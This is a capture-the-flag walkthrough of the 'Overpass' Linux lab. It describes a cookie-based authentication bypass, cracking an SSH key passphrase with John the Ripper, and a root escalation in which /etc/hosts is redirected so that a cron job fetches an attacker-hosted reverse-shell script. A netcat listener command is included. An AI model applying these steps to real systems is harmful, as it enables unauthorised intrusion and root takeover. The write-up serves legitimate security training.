[Linux] Overpass

Reconnaissance

sudo nmap 10.10.108.252
sudo nmap -A 10.10.108.252

Enumeration

HTTP

Web page enumeration

gobuster dir -u 10.10.108.252 -w /usr/share/wordlists/dirb/big.txt -t 64

We discovered a page named /admin, which might be worth exploring.

On this page, there's a login form. I attempted various techniques to bypass authentication: brute-force attacks, SQL injection, and exploiting known vulnerabilities. However, none of them worked.

After reviewing the hints provided, which mentioned the OWASP Top 10, I decided to explore the first item on the list: Broken Access Control. Inspecting the page source code in the browser's developer tools, I noticed something interesting in login.js, the application checks for a cookie named SessionToken.

By setting a fake value for this cookie, I was able to bypass authentication and access a page containing an RSA private key.

It appears the key belongs to a user named james. I saved it locally and set the appropriate permissions:

chmod 600 james_id_rsa

The private key is password-protected, so we need to crack it using John the Ripper:

ssh2john james_id_rsa > james_id_rsa_john_format
john --wordlist=/usr/share/wordlists/rockyou.txt james_id_rsa_john_format

With the recovered password, we can now SSH into the machine and retrieve the user flag.

Further exploring the "Overpass" application on the system, we obtain James's password, but this doesn’t yield any additional privilege or access.

Escalation

Process analysis

We use scp to upload pspy to the target machine. Monitoring processes reveals a cron job that downloads and executes a script from overpass.thm as root (uid=0).

We also confirm that we can edit the /etc/hosts file, which is useful given what we've just discovered:

find /opt /etc /bin /sbin /usr/bin /usr/sbin /home /root -writable 2>/dev/null

Exploitation Strategy

1. On the attacker's machine, create a file named buildscript.sh containing a reverse shell payload.

1. Start a simple HTTP server in the directory containing two folders: downloads and downloads/src. Place buildscript.sh inside downloads/src.

1. Start a listener to catch the reverse shell:

nc -nlvp 8081

1. On the target machine, edit the /etc/hosts file to resolve overpass.thm to the attacker's IP address.

1. Wait for the cron job to run. It will download and execute your malicious script as root, giving you a reverse shell with root privileges.

Conlusion

• Weak credentials used for SSH private key.

• Poor file permissions, allowing modification of critical files like /etc/hosts.

• Insecure cron job that blindly downloads and executes scripts as root.